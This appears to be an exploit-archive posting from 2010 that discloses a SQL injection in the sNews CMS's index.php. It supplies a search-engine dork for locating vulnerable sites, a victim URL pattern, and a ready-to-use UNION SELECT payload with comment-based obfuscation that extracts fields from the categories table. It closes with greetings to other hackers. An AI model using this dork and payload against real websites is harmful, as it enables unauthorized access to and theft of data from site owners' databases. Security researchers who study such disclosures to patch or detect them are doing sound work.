sNews (index.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : sNews (index.php) SQL Injection Vulnerability
# Published : 2010-07-24
# Author : MajoR
# Previous Title : Open Realty 2.x and 3.x Persistent XSS Vulnerability
# Next Title : Freeway CMS 1.4.3.210 SQL Injection Vulnerability

# Exploit Title:sNews (index.php) SQL Injection Vulnerability

# Date: 2010-07-24

# Author: MajoR

# Software Link: http://snews.awddesign.co.uk

# Version: N/A

# Tested on: Wnidows xp SP2

# CVE : N/A



====================================================sNews (index.php) SQL Injection Vulnerability
===================================================

Author :   MajoR
Email  : Ma-j-oR@hotmail.fr

DORK    :  "Powered by sNews " inurl:index.php?id=

===================================================


[+] Vulnerable File : 

http://www.Victime.com/sNews/index.php?id=

[+] ExploiT :


-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--

====================================================


Greetingz To SlaSSi & Xella